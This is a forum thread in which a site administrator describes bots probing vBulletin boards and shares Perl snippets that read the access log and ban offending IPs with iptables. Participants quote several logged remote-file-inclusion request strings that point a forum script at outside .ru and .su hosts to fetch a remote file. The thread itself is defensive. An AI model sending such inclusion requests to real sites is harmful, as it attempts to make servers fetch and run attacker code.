![]() |
Load Relief: Block the sniffers
If you have ever perused your logs on your big board, or any board for that matter, chances are you have seen requests like this:
Code:
/forums/showthread.php?t=http://somehackersite-usually-russian.ru/images/cs.txt? For the most part, these have been ferreted out by the VB team so it really isn't much to be worried about as far as security. These are just bots hitting known VB installs trying to recruit machines for some idiots nefarious dealings. If you watch your log in real time however, you can see that this happens over and over.. Multiple IP's from multiple locations. Basically, every time they hit the site, it creates load on the server. This really annoys me because seriously, it is a waste of resources for not just me, but the hackers themselves. So finally I fired up my Perl scripting and wrote up something that searched the webserver log (access_log) and if it found any attempt to grab a thread starting with http:// it just banned it via iptables.. Here is a snippet: Code:
open (FH, '/home/mysite/logs/access_log'); Code:
$ban = `/sbin/iptables -I INPUT -s $ipaddress -j DROP`; Of course, the server could just be experiencing a slow week, but the numbers don't really indicate that. I am considering redoing the script so I can release it to everyone free, it is just cobbled together at the moment so I don't really want to put it up yet. Has anyone else here run into the same issues? Would anyone here be interested in the PERL script? |
Just an update on this... I had to modify my code a bit because for some reason, I set a threshold of 5 offenses by an IP before it would ban them. It was something I had in another application of mine that I carried into it. Now I ban on the first offense.
So far over the last 7 days, 1,259 drops issued to iptables. Load throughout the day continues to drop. |
Cool! i like the sound of this not that i own a big board but hey it would help to put it on before it gets to the point you were at no?
|
1 Attachment(s)
I see that kind of link a lot but with my groups :eek:
example: Attachment 73592 I've seen them a lot this past 2 weeks but only in my groups.. hmmmmm |
one was a .text too.
--------------- Added [DATE]1198356811[/DATE] at [TIME]1198356811[/TIME] --------------- and yet another one just now! AGH! Guest Viewing Error Message /groups/groups.php?g=http://migirlsadaoiwqiseatmeisum.mail333.su/body? Unknown Location /groups/groups.php?g=http://migirlsadaoiwqiseatmeisum.mail333.su/body? Are they trying to hack or use my mail system?? |
They are just bots scouring the net looking for vulnerabilities so they can exploit them. There is no one person sitting there clicking..
If your software is up to date, chances are, you have nothing to worry about. |
Thanks!
|
A good firewall blocks this sort of attempted exploit automatically. I use Astaro and it blocks 70,000 or more exploits/attacks/probes daily. This is a great system and I sleep a little easier at night. Eric
|
Quote:
If you are serving data dynamically, of course there is a chance someone could hack your system, which is why there are patches for software. |
Me thinks the load drop may have more with the Christmas season traffic lull than with the banning of these IP addresses....
|
All times are GMT. The time now is 10:43 AM. |
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
![]() |
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|